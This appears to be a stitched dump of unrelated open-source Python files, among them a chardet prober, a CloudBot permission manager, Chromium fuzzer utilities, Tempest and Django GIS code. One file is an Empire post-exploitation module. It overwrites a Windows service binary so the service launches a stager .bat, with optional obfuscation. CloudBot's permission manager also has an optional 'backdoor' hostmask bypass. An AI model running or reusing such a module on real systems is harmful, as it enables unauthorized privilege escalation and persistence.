from omero.plugins.download import DownloadControl
from omero.cli import CLI, NonZeroReturnCode
class TestDownload(object):
def setup_method(self, method):
self.cli = CLI()
self.cli.register("download", DownloadControl, "TEST")
self.args = ["download"]
def testHelp(self):
self.args += ["-h"]
self.cli.invoke(self.args, strict=True)
@pytest.mark.parametrize(
'bad_input',
['-1', 'OriginalFile:-1', 'FileAnnotation:-1', 'Image:-1'])
def testInvalidInput(self, bad_input):
self.args += [bad_input, '-']
with pytest.raises(NonZeroReturnCode):
self.cli.invoke(self.args, strict=True)
|
ray-zhong/github_trend_spider
|
refs/heads/master
|
ENV/Lib/site-packages/pip/_vendor/requests/packages/chardet/sjisprober.py
|
1776
|
######################## BEGIN LICENSE BLOCK ########################
# The Original Code is mozilla.org code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 1998
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
import sys
from .mbcharsetprober import MultiByteCharSetProber
from .codingstatemachine import CodingStateMachine
from .chardistribution import SJISDistributionAnalysis
from .jpcntx import SJISContextAnalysis
from .mbcssm import SJISSMModel
from . import constants
class SJISProber(MultiByteCharSetProber):
def __init__(self):
MultiByteCharSetProber.__init__(self)
self._mCodingSM = CodingStateMachine(SJISSMModel)
self._mDistributionAnalyzer = SJISDistributionAnalysis()
self._mContextAnalyzer = SJISContextAnalysis()
self.reset()
def reset(self):
MultiByteCharSetProber.reset(self)
self._mContextAnalyzer.reset()
def get_charset_name(self):
return self._mContextAnalyzer.get_charset_name()
def feed(self, aBuf):
aLen = len(aBuf)
for i in range(0, aLen):
codingState = self._mCodingSM.next_state(aBuf[i])
if codingState == constants.eError:
if constants._debug:
sys.stderr.write(self.get_charset_name()
+ ' prober hit error at byte ' + str(i)
+ '\n')
self._mState = constants.eNotMe
break
elif codingState == constants.eItsMe:
self._mState = constants.eFoundIt
break
elif codingState == constants.eStart:
charLen = self._mCodingSM.get_current_charlen()
if i == 0:
self._mLastChar[1] = aBuf[0]
self._mContextAnalyzer.feed(self._mLastChar[2 - charLen:],
charLen)
self._mDistributionAnalyzer.feed(self._mLastChar, charLen)
else:
self._mContextAnalyzer.feed(aBuf[i + 1 - charLen:i + 3
- charLen], charLen)
self._mDistributionAnalyzer.feed(aBuf[i - 1:i + 1],
charLen)
self._mLastChar[0] = aBuf[aLen - 1]
if self.get_state() == constants.eDetecting:
if (self._mContextAnalyzer.got_enough_data() and
(self.get_confidence() > constants.SHORTCUT_THRESHOLD)):
self._mState = constants.eFoundIt
return self.get_state()
def get_confidence(self):
contxtCf = self._mContextAnalyzer.get_confidence()
distribCf = self._mDistributionAnalyzer.get_confidence()
return max(contxtCf, distribCf)
|
thurday/sslyze
|
refs/heads/master
|
setup.py
|
5
|
#!/usr/bin/env python
from sys import platform
from sslyze import PROJECT_VERSION, PROJECT_URL, PROJECT_EMAIL, PROJECT_DESC
from distutils.core import setup
NASSL_BINARY = '_nassl.so'
if platform == 'win32':
NASSL_BINARY = '_nassl.pyd'
SSLYZE_SETUP = {
'name' : 'SSLyze',
'version' : PROJECT_VERSION,
'description' : PROJECT_DESC,
'long_description' : open('README.md').read() + '\n' + open('AUTHORS.txt').read(),
'author_email' : PROJECT_EMAIL,
'url' : PROJECT_URL,
'scripts' : ['sslyze.py'],
'packages' : ['plugins', 'utils', 'nassl'],
'package_data' : {'plugins' : ['data/trust_stores/*.pem'],
'nassl' : [NASSL_BINARY]},
'license' : open('LICENSE.txt').read()
}
setup(**SSLYZE_SETUP)
|
alisaifee/AutobahnPython
|
refs/heads/master
|
examples/twisted/websocket/echo_variants/client_with_params.py
|
18
|
###############################################################################
##
## Copyright (C) 2011-2013 Tavendo GmbH
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
##
###############################################################################
import sys
from twisted.internet import reactor
from autobahn.twisted.websocket import WebSocketClientFactory, \
WebSocketClientProtocol, \
connectWS
class EchoClientProtocol(WebSocketClientProtocol):
def __init__(self, message):
self.message = message.encode('utf8')
def sendHello(self):
self.sendMessage(self.message)
def onOpen(self):
self.sendHello()
def onMessage(self, payload, isBinary):
if not isBinary:
print("Text message received: {}".format(payload.decode('utf8')))
reactor.callLater(1, self.sendHello)
class EchoClientFactory(WebSocketClientFactory):
def buildProtocol(self, addr):
proto = EchoClientProtocol(self.message)
proto.factory = self
return proto
if __name__ == '__main__':
if len(sys.argv) < 2:
print "Need the WebSocket server address, i.e. ws://localhost:9000"
sys.exit(1)
factory = EchoClientFactory(sys.argv[1])
factory.message = sys.argv[2] if len(sys.argv) > 2 else "My configurable message"
connectWS(factory)
reactor.run()
|
thebestgirl123/CloudBot
|
refs/heads/gonzobot
|
cloudbot/permissions.py
|
32
|
from fnmatch import fnmatch
import logging
logger = logging.getLogger("cloudbot")
# put your hostmask here for magic
# it's disabled by default, see has_perm_mask()
backdoor = None
class PermissionManager(object):
"""
:type name: str
:type config: dict[str, ?]
:type group_perms: dict[str, list[str]]
:type group_users: dict[str, list[str]]
:type perm_users: dict[str, list[str]]
"""
def __init__(self, conn):
"""
:type conn: cloudbot.client.Client
"""
logger.info("[{}|permissions] Created permission manager for {}.".format(conn.name, conn.name))
# stuff
self.name = conn.name
self.config = conn.config
self.group_perms = {}
self.group_users = {}
self.perm_users = {}
self.reload()
def reload(self):
self.group_perms = {}
self.group_users = {}
self.perm_users = {}
logger.info("[{}|permissions] Reloading permissions for {}.".format(self.name, self.name))
groups = self.config.get("permissions", {})
# work out the permissions and users each group has
for key, value in groups.items():
if not key.islower():
logger.warning("[{}|permissions] Warning! Non-lower-case group '{}' in config. This will cause problems"
" when setting permissions using the bot's permissions commands"
.format(self.name, key))
key = key.lower()
self.group_perms[key] = []
self.group_users[key] = []
for permission in value["perms"]:
self.group_perms[key].append(permission.lower())
for user in value["users"]:
self.group_users[key].append(user.lower())
for group, users in self.group_users.items():
group_perms = self.group_perms[group]
for perm in group_perms:
if self.perm_users.get(perm) is None:
self.perm_users[perm] = []
self.perm_users[perm].extend(users)
logger.debug("[{}|permissions] Group permissions: {}".format(self.name, self.group_perms))
logger.debug("[{}|permissions] Group users: {}".format(self.name, self.group_users))
logger.debug("[{}|permissions] Permission users: {}".format(self.name, self.perm_users))
def has_perm_mask(self, user_mask, perm, notice=True):
"""
:type user_mask: str
:type perm: str
:rtype: bool
"""
if backdoor:
if fnmatch(user_mask.lower(), backdoor.lower()):
return True
if not perm.lower() in self.perm_users:
# no one has access
return False
allowed_users = self.perm_users[perm.lower()]
for allowed_mask in allowed_users:
if fnmatch(user_mask.lower(), allowed_mask):
if notice:
logger.info("[{}|permissions] Allowed user {} access to {}".format(self.name, user_mask, perm))
return True
return False
def get_groups(self):
return set().union(self.group_perms.keys(), self.group_users.keys())
def get_group_permissions(self, group):
"""
:type group: str
:rtype: list[str]
"""
return self.group_perms.get(group.lower())
def get_group_users(self, group):
"""
:type group: str
:rtype: list[str]
"""
return self.group_users.get(group.lower())
def get_user_permissions(self, user_mask):
"""
:type user_mask: str
:rtype: list[str]
"""
permissions = set()
for permission, users in self.perm_users.items():
for mask_to_check in users:
if fnmatch(user_mask.lower(), mask_to_check):
permissions.add(permission)
return permissions
def get_user_groups(self, user_mask):
"""
:type user_mask: str
:rtype: list[str]
"""
groups = []
for group, users in self.group_users.items():
for mask_to_check in users:
if fnmatch(user_mask.lower(), mask_to_check):
groups.append(group)
continue
return groups
def group_exists(self, group):
"""
Checks whether a group exists
:type group: str
:rtype: bool
"""
return group.lower() in self.group_perms
def user_in_group(self, user_mask, group):
"""
Checks whether a user is matched by any masks in a given group
:type group: str
:type user_mask: str
:rtype: bool
"""
users = self.group_users.get(group.lower())
if not users:
return False
for mask_to_check in users:
if fnmatch(user_mask.lower(), mask_to_check):
return True
return False
def remove_group_user(self, group, user_mask):
"""
Removes all users that match user_mask from group. Returns a list of user masks removed from the group.
Use permission_manager.reload() to make this change take affect.
Use bot.config.save_config() to save this change to file.
:type group: str
:type user_mask: str
:rtype: list[str]
"""
masks_removed = []
config_groups = self.config.get("permissions", {})
for mask_to_check in list(self.group_users[group.lower()]):
if fnmatch(user_mask.lower(), mask_to_check):
masks_removed.append(mask_to_check)
# We're going to act like the group keys are all lowercase.
# The user has been warned (above) if they aren't.
# Okay, maybe a warning, but no support.
if group not in config_groups:
logger.warning(
"[{}|permissions] Can't remove user from group due to"
" upper-case group names!".format(self.name))
continue
config_group = config_groups.get(group)
config_users = config_group.get("users")
config_users.remove(mask_to_check)
return masks_removed
def add_user_to_group(self, user_mask, group):
"""
Adds user to group. Returns whether this actually did anything.
Use permission_manager.reload() to make this change take affect.
Use bot.config.save_config() to save this change to file.
:type group: str
:type user_mask: str
:rtype: bool
"""
if self.user_in_group(user_mask, group):
return False
# We're going to act like the group keys are all lowercase.
# The user has been warned (above) if they aren't.
groups = self.config.get("permissions", {})
if group in groups:
group_dict = groups.get(group)
users = group_dict["users"]
users.append(user_mask)
else:
# create the group
group_dict = {"users": [user_mask], "perms": []}
groups[group] = group_dict
return True
|
js0701/chromium-crosswalk
|
refs/heads/master
|
tools/ipc_fuzzer/scripts/utils.py
|
38
|
#!/usr/bin/env python
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Utility functions used by Generational and Mutational ClusterFuzz
fuzzers."""
import argparse
import os
import random
import string
import sys
import tempfile
APP_PATH_KEY = 'APP_PATH'
FLAGS_PREFIX = 'flags-'
FUZZ_PREFIX = 'fuzz-'
IPC_FUZZER_APPLICATION = 'ipc_fuzzer'
IPC_REPLAY_APPLICATION = 'ipc_fuzzer_replay'
IPCDUMP_EXTENSION = '.ipcdump'
LAUNCH_PREFIXES = [
'--gpu-launcher',
'--plugin-launcher',
'--ppapi-plugin-launcher',
'--renderer-cmd-prefix',
'--utility-cmd-prefix',
]
def application_name_for_platform(application_name):
"""Return application name for current platform."""
if platform() == 'WINDOWS':
return application_name + '.exe'
return application_name
def create_flags_file(ipcdump_testcase_path, ipc_replay_application_path):
"""Create a flags file to add launch prefix to application command line."""
random_launch_prefix = random.choice(LAUNCH_PREFIXES)
file_content = '%s=%s' % (random_launch_prefix, ipc_replay_application_path)
flags_file_path = ipcdump_testcase_path.replace(FUZZ_PREFIX, FLAGS_PREFIX)
file_handle = open(flags_file_path, 'w')
file_handle.write(file_content)
file_handle.close()
def create_temp_file():
"""Create a temporary file."""
temp_file = tempfile.NamedTemporaryFile(delete=False)
temp_file.close()
return temp_file.name
def get_fuzzer_application_name():
"""Get the application name for the fuzzer binary."""
return application_name_for_platform(IPC_FUZZER_APPLICATION)
def get_replay_application_name():
"""Get the application name for the replay binary."""
return application_name_for_platform(IPC_REPLAY_APPLICATION)
def parse_arguments():
"""Parse fuzzer arguments."""
parser = argparse.ArgumentParser()
parser.add_argument('--input_dir')
parser.add_argument('--output_dir')
parser.add_argument('--no_of_files', type=int)
args = parser.parse_args();
if (not args.input_dir or
not args.output_dir or
not args.no_of_files):
parser.print_help()
sys.exit(1)
return args
def random_id(size=16, chars=string.ascii_lowercase):
"""Return a random id string, default 16 characters long."""
return ''.join(random.choice(chars) for _ in range(size))
def random_ipcdump_testcase_path(ipcdump_directory):
"""Return a random ipc testcase path."""
return os.path.join(
ipcdump_directory,
'%s%s%s' % (FUZZ_PREFIX, random_id(), IPCDUMP_EXTENSION))
def platform():
"""Return running platform."""
if sys.platform.startswith('win'):
return 'WINDOWS'
if sys.platform.startswith('linux'):
return 'LINUX'
if sys.platform == 'darwin':
return 'MAC'
assert False, 'Unknown platform'
def get_application_path():
"""Return chrome application path."""
if APP_PATH_KEY not in os.environ:
sys.exit(
'Environment variable %s should be set to chrome path.' % APP_PATH_KEY)
return os.environ[APP_PATH_KEY]
|
echodaemon/Empire
|
refs/heads/master
|
lib/modules/powershell/privesc/powerup/service_exe_stager.py
|
10
|
from lib.common import helpers
class Module:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'Install-ServiceBinary',
'Author': ['@harmj0y'],
'Description': ("Backs up a service's binary and replaces the original "
"with a binary that launches a stager.bat."),
'Background' : True,
'OutputExtension' : None,
'NeedsAdmin' : False,
'OpsecSafe' : False,
'Language' : 'powershell',
'MinLanguageVersion' : '2',
'Comments': [
'https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp'
]
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
'Description' : 'Agent to run module on.',
'Required' : True,
'Value' : ''
},
'ServiceName' : {
'Description' : "The service name to manipulate.",
'Required' : True,
'Value' : ''
},
'Delete' : {
'Description' : "Switch. Have the launcher.bat delete itself after running.",
'Required' : False,
'Value' : 'True'
},
'Listener' : {
'Description' : 'Listener to use.',
'Required' : True,
'Value' : ''
},
'UserAgent' : {
'Description' : 'User-agent string to use for the staging request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'Proxy' : {
'Description' : 'Proxy to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'ProxyCreds' : {
'Description' : 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self, obfuscate=False, obfuscationCommand=""):
# read in the common powerup.ps1 module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/privesc/PowerUp.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
return ""
moduleCode = f.read()
f.close()
serviceName = self.options['ServiceName']['Value']
# # get just the code needed for the specified function
# script = helpers.generate_dynamic_powershell_script(moduleCode, "Write-ServiceEXECMD")
script = moduleCode
# generate the .bat launcher code to write out to the specified location
l = self.mainMenu.stagers.stagers['windows/launcher_bat']
l.options['Listener']['Value'] = self.options['Listener']['Value']
l.options['UserAgent']['Value'] = self.options['UserAgent']['Value']
l.options['Proxy']['Value'] = self.options['Proxy']['Value']
l.options['ProxyCreds']['Value'] = self.options['ProxyCreds']['Value']
if self.options['Delete']['Value'].lower() == "true":
l.options['Delete']['Value'] = "True"
else:
l.options['Delete']['Value'] = "False"
launcherCode = l.generate()
# PowerShell code to write the launcher.bat out
scriptEnd = ";$tempLoc = \"$env:temp\\debug.bat\""
scriptEnd += "\n$batCode = @\"\n" + launcherCode + "\"@\n"
scriptEnd += "$batCode | Out-File -Encoding ASCII $tempLoc ;\n"
scriptEnd += "\"Launcher bat written to $tempLoc `n\";\n"
if launcherCode == "":
print helpers.color("[!] Error in launcher .bat generation.")
return ""
else:
scriptEnd += "\nInstall-ServiceBinary -ServiceName \""+str(serviceName)+"\" -Command \"C:\\Windows\\System32\\cmd.exe /C $tempLoc\""
if obfuscate:
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script
|
woshilapin/cjdns
|
refs/heads/master
|
node_build/dependencies/libuv/build/gyp/test/defines/gyptest-defines-env.py
|
501
|
#!/usr/bin/env python
# Copyright (c) 2009 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Verifies build of an executable with C++ define specified by a gyp define.
"""
import os
import TestGyp
test = TestGyp.TestGyp()
# With the value only given in environment, it should be used.
try:
os.environ['GYP_DEFINES'] = 'value=10'
test.run_gyp('defines-env.gyp')
finally:
del os.environ['GYP_DEFINES']
test.build('defines-env.gyp')
expect = """\
VALUE is 10
"""
test.run_built_executable('defines', stdout=expect)
# With the value given in both command line and environment,
# command line should take precedence.
try:
os.environ['GYP_DEFINES'] = 'value=20'
test.run_gyp('defines-env.gyp', '-Dvalue=25')
finally:
del os.environ['GYP_DEFINES']
test.sleep()
test.touch('defines.c')
test.build('defines-env.gyp')
expect = """\
VALUE is 25
"""
test.run_built_executable('defines', stdout=expect)
# With the value only given in environment, it should be ignored if
# --ignore-environment is specified.
try:
os.environ['GYP_DEFINES'] = 'value=30'
test.run_gyp('defines-env.gyp', '--ignore-environment')
finally:
del os.environ['GYP_DEFINES']
test.sleep()
test.touch('defines.c')
test.build('defines-env.gyp')
expect = """\
VALUE is 5
"""
test.run_built_executable('defines', stdout=expect)
# With the value given in both command line and environment, and
# --ignore-environment also specified, command line should still be used.
try:
os.environ['GYP_DEFINES'] = 'value=40'
test.run_gyp('defines-env.gyp', '--ignore-environment', '-Dvalue=45')
finally:
del os.environ['GYP_DEFINES']
test.sleep()
test.touch('defines.c')
test.build('defines-env.gyp')
expect = """\
VALUE is 45
"""
test.run_built_executable('defines', stdout=expect)
test.pass_test()
|
glemaitre/protoclass
|
refs/heads/master
|
protoclass/extraction/mrsi_spectra_extraction.py
|
1
|
"""MRSI spectra extraction from MRSI modality."""
from __future__ import division
import numpy as np
from scipy.linalg import norm as lnorm
from .mrsi_extraction import MRSIExtraction
KNOWN_NORMALIZATION = ('l2', 'l1')
class MRSISpectraExtraction(MRSIExtraction):
"""MRSI spectra extraction from MRSI modality.
Parameters
----------
base_modality : object
The base modality on which the normalization will be applied. The base
modality should inherate from StandaloneModality class.
ppm_range : tuple of float, optional (default=(2., 4.))
Define the range of ppm to extract from the spectrum.
normalization : None or str, optional (default='l2')
Apply a normalization or not. Choice are None, 'l2', or 'l1'.
Attributes
----------
base_modality_ : object
The base modality on which the normalization will be applied. The base
modality should inherate from StandaloneModality class.
roi_data_ : ndarray, shape flexible
Corresponds to the index to consider in order to fit the data.
"""
def __init__(self, base_modality, ppm_range=(2., 4.), normalization='l2'):
super(MRSISpectraExtraction, self).__init__(base_modality)
self.ppm_range = ppm_range
self.normalization = normalization
self.is_fitted = False
self.data_ = None
def fit(self, modality, ground_truth=None, cat=None):
"""Find the parameters needed to apply the extraction.
Parameters
----------
modality : object of type TemporalModality
The modality object of interest.
ground-truth : object of type GTModality or None
The ground-truth of GTModality. If None, the whole data will be
considered.
cat : str or None
String corresponding at the ground-truth of interest. Cannot be
None if ground-truth is not None.
Return
------
self : object
Return self.
"""
super(MRSISpectraExtraction, self).fit(
modality=modality,
ground_truth=ground_truth,
cat=cat)
# Check if we need to know the normalization factor
if self.normalization is not None:
if self.normalization not in KNOWN_NORMALIZATION:
raise ValueError('Unknown normalization.')
self.fit_params_ = np.zeros((modality.data_.shape[1],
modality.data_.shape[2],
modality.data_.shape[3]))
for y in range(modality.data_.shape[1]):
for x in range(modality.data_.shape[2]):
for z in range(modality.data_.shape[3]):
if self.normalization == 'l1':
self.fit_params_[y, x, z] = lnorm(np.real(
modality.data_[:, y, x, z]), 1)
if self.normalization == 'l2':
self.fit_params_[y, x, z] = lnorm(np.real(
modality.data_[:, y, x, z]), 2)
self.is_fitted = True
return self
def transform(self, modality, ground_truth=None, cat=None):
"""Extract the data from the given modality.
Parameters
----------
modality : object of type StandaloneModality
The modality object of interest.
ground-truth : object of type GTModality or None
The ground-truth of GTModality. If None, the whole data will be
considered.
cat : str or None
String corresponding at the ground-truth of interest. Cannot be
None if ground-truth is not None.
Returns
------
data : ndarray, shape (n_sample, n_feature)
A matrix containing the features extracted. The number of samples
is equal to the number of positive label in the ground-truth.
"""
super(MRSISpectraExtraction, self).transform(
modality=modality,
ground_truth=ground_truth,
cat=cat)
# Check that the data have been fitted
if not self.is_fitted:
raise ValueError('Fit the data first.')
# We need first to crop the data properly depending of the ppm range
idx_ppm_crop = []
for y in range(modality.bandwidth_ppm.shape[1]):
for x in range(modality.bandwidth_ppm.shape[2]):
for z in range(modality.bandwidth_ppm.shape[3]):
# Get the range for the current data
# Compute the delta
delta_ppm = np.abs((modality.bandwidth_ppm[1, y, x, z] -
modality.bandwidth_ppm[0, y, x, z]))
# Compute the number of element to take
nb_element = int(np.ceil((self.ppm_range[1] -
self.ppm_range[0]) / delta_ppm))
# Find the first index
first_idx = np.flatnonzero(
modality.bandwidth_ppm[:, y, x, z] >
self.ppm_range[0])[-1]
idx_mask = np.arange(first_idx, first_idx - nb_element, -1)
idx_ppm_crop.append(idx_mask)
# Convert the list into an array
idx_ppm_crop = np.array(idx_ppm_crop)
# Reshape the array according to the data
idx_ppm_crop = np.reshape(idx_ppm_crop.T,
(idx_ppm_crop.shape[1],
modality.bandwidth_ppm.shape[1],
modality.bandwidth_ppm.shape[2],
modality.bandwidth_ppm.shape[3]))
# Extract the appropriate part of each signal
data_crop = np.zeros(idx_ppm_crop.shape)
for y in range(modality.data_.shape[1]):
for x in range(modality.data_.shape[2]):
for z in range(modality.data_.shape[3]):
data_crop[:, y, x, z] = np.real(modality.data_[
idx_ppm_crop[:, y, x, z], y, x, z])
# Apply the normalization if necessary
if self.normalization is not None:
data_crop[:, y, x, z] /= self.fit_params_[y, x, z]
data_res = np.zeros((data_crop.shape[0],
ground_truth.data_.shape[1],
ground_truth.data_.shape[2],
ground_truth.data_.shape[3]))
# Resample each ppm of the spectum
for ii in range(data_crop.shape[0]):
# Resample each ppm slice
data_res[ii, :, :, :] = self._resampling_as_gt(
data_crop[ii, :, :, :],
modality,
ground_truth)
# Convert the roi to a numpy array
roi_data = np.array(self.roi_data_)
# Check the number of samples which will be extracted
n_sample = roi_data.shape[1]
# Check the number of dimension
n_dimension = data_res.shape[0]
# Allocate the array
data = np.empty((n_sample, n_dimension))
# Copy the data at the right place
for idx_sample in range(n_sample):
# Get the coordinate of the point to consider
coord = roi_data[:, idx_sample]
# Extract the data
data[idx_sample, :] = data_res[:,
coord[0],
coord[1],
coord[2]]
return data
|
armando-migliaccio/tempest
|
refs/heads/master
|
tempest/services/compute/xml/security_groups_client.py
|
6
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
#
# Copyright 2012 IBM Corp.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from lxml import etree
import urllib
from tempest.common.rest_client import RestClientXML
from tempest import exceptions
from tempest.services.compute.xml.common import Document
from tempest.services.compute.xml.common import Element
from tempest.services.compute.xml.common import Text
from tempest.services.compute.xml.common import xml_to_json
from tempest.services.compute.xml.common import XMLNS_11
class SecurityGroupsClientXML(RestClientXML):
def __init__(self, config, username, password, auth_url, tenant_name=None):
super(SecurityGroupsClientXML, self).__init__(
config, username, password,
auth_url, tenant_name)
self.service = self.config.compute.catalog_type
def _parse_array(self, node):
array = []
for child in node.getchildren():
array.append(xml_to_json(child))
return array
def _parse_body(self, body):
json = xml_to_json(body)
return json
def list_security_groups(self, params=None):
"""List all security groups for a user."""
url = 'os-security-groups'
if params:
url += '?%s' % urllib.urlencode(params)
resp, body = self.get(url, self.headers)
body = self._parse_array(etree.fromstring(body))
return resp, body
def get_security_group(self, security_group_id):
"""Get the details of a Security Group."""
url = "os-security-groups/%s" % str(security_group_id)
resp, body = self.get(url, self.headers)
body = self._parse_body(etree.fromstring(body))
return resp, body
def create_security_group(self, name, description):
"""
Creates a new security group.
name (Required): Name of security group.
description (Required): Description of security group.
"""
security_group = Element("security_group", name=name)
des = Element("description")
des.append(Text(content=description))
security_group.append(des)
resp, body = self.post('os-security-groups',
str(Document(security_group)),
self.headers)
body = self._parse_body(etree.fromstring(body))
return resp, body
def delete_security_group(self, security_group_id):
"""Deletes the provided Security Group."""
return self.delete('os-security-groups/%s' %
str(security_group_id), self.headers)
def create_security_group_rule(self, parent_group_id, ip_proto, from_port,
to_port, **kwargs):
"""
Creating a new security group rules.
parent_group_id :ID of Security group
ip_protocol : ip_proto (icmp, tcp, udp).
from_port: Port at start of range.
to_port : Port at end of range.
Following optional keyword arguments are accepted:
cidr : CIDR for address range.
group_id : ID of the Source group
"""
group_rule = Element("security_group_rule")
elements = dict()
elements['cidr'] = kwargs.get('cidr')
elements['group_id'] = kwargs.get('group_id')
elements['parent_group_id'] = parent_group_id
elements['ip_protocol'] = ip_proto
elements['from_port'] = from_port
elements['to_port'] = to_port
for k, v in elements.items():
if v is not None:
element = Element(k)
element.append(Text(content=str(v)))
group_rule.append(element)
url = 'os-security-group-rules'
resp, body = self.post(url, str(Document(group_rule)), self.headers)
body = self._parse_body(etree.fromstring(body))
return resp, body
def delete_security_group_rule(self, group_rule_id):
"""Deletes the provided Security Group rule."""
return self.delete('os-security-group-rules/%s' %
str(group_rule_id), self.headers)
def list_security_group_rules(self, security_group_id):
"""List all rules for a security group."""
url = "os-security-groups"
resp, body = self.get(url, self.headers)
body = etree.fromstring(body)
secgroups = body.getchildren()
for secgroup in secgroups:
if secgroup.get('id') == security_group_id:
node = secgroup.find('{%s}rules' % XMLNS_11)
rules = [xml_to_json(x) for x in node.getchildren()]
return resp, rules
raise exceptions.NotFound('No such Security Group')
|
beckastar/django
|
refs/heads/master
|
django/contrib/gis/db/models/sql/where.py
|
70
|
from django.db.models.constants import LOOKUP_SEP
from django.db.models.fields import FieldDoesNotExist
from django.db.models.sql.expressions import SQLEvaluator
from django.db.models.sql.where import Constraint, WhereNode
from django.contrib.gis.db.models.fields import GeometryField
class GeoConstraint(Constraint):
"""
This subclass overrides `process` to better handle geographic SQL
construction.
"""
def __init__(self, init_constraint):
self.alias = init_constraint.alias
self.col = init_constraint.col
self.field = init_constraint.field
def process(self, lookup_type, value, connection):
if isinstance(value, SQLEvaluator):
# Make sure the F Expression destination field exists, and
# set an `srid` attribute with the same as that of the
# destination.
geo_fld = GeoWhereNode._check_geo_field(value.opts, value.expression.name)
if not geo_fld:
raise ValueError('No geographic field found in expression.')
value.srid = geo_fld.srid
db_type = self.field.db_type(connection=connection)
params = self.field.get_db_prep_lookup(lookup_type, value, connection=connection)
return (self.alias, self.col, db_type), params
class GeoWhereNode(WhereNode):
"""
Used to represent the SQL where-clause for spatial databases --
these are tied to the GeoQuery class that created it.
"""
def _prepare_data(self, data):
if isinstance(data, (list, tuple)):
obj, lookup_type, value = data
if (isinstance(obj, Constraint) and
isinstance(obj.field, GeometryField)):
data = (GeoConstraint(obj), lookup_type, value)
return super(GeoWhereNode, self)._prepare_data(data)
def make_atom(self, child, qn, connection):
lvalue, lookup_type, value_annot, params_or_value = child
if isinstance(lvalue, GeoConstraint):
data, params = lvalue.process(lookup_type, params_or_value, connection)
spatial_sql, spatial_params = connection.ops.spatial_lookup_sql(
data, lookup_type, params_or_value, lvalue.field, qn)
return spatial_sql, spatial_params + params
else:
return super(GeoWhereNode, self).make_atom(child, qn, connection)
@classmethod
def _check_geo_field(cls, opts, lookup):
"""
Utility for checking the given lookup with the given model options.
The lookup is a string either specifying the geographic field, e.g.
'point, 'the_geom', or a related lookup on a geographic field like
'address__point'.
If a GeometryField exists according to the given lookup on the model
options, it will be returned. Otherwise returns None.
"""
# This takes into account the situation where the lookup is a
# lookup to a related geographic field, e.g., 'address__point'.
field_list = lookup.split(LOOKUP_SEP)
# Reversing so list operates like a queue of related lookups,
# and popping the top lookup.
field_list.reverse()
fld_name = field_list.pop()
try:
geo_fld = opts.get_field(fld_name)
# If the field list is still around, then it means that the
# lookup was for a geometry field across a relationship --
# thus we keep on getting the related model options and the
# model field associated with the next field in the list
# until there's no more left.
while len(field_list):
opts = geo_fld.rel.to._meta
geo_fld = opts.get_field(field_list.pop())
except (FieldDoesNotExist, AttributeError):
return False
# Finally, make sure we got a Geographic field and return.
if isinstance(geo_fld, GeometryField):
return geo_fld
else:
return False
|
curiousguy13/shogun
|
refs/heads/develop
|
examples/undocumented/python_modular/tools/generate_circle_data.py
|
36
|
from numpy import *
import numpy as np
import sys
import math as m
class circle_data:
def __init__(self):
pass
def generate_data(self,number_of_points_for_circle1,number_of_points_for_circle2,row_vector):
"""
generate_circle_data generates a dataset in the shape of 2 circles.In this particular example we have taken the radius of
the 2 circles to be 10 and 30.
'number_of_points_for_circle1' and 'number_of_points_for_circle2' define the number of y
coordinates for each circle.
'row_vector': decides the dimension of the input data.In this particular example it is taken as 2
'circle1':the first circle
'circle2':the second circle
'xmin_circle1':the minimum value of the x coordinate for first circle
'xmax_circle1':the maximum value of the x coordinate for first circle
'xmin_circle2':the minimum value of the x coordinate for second circle
'xmax_circle2':the maximum value of the x coordinate for second circle
'xrange_circle1': the horizontal range of the x ccordinates of first circle
'xrange_circle2': the horizontal range of the x ccordinates of second circle
'radius1':the radius of the first circle
'radius2':the radius of the second circle
'two_circles':the concatenated data of the 2 circles
"""
#number_of_points_for_circle1=42
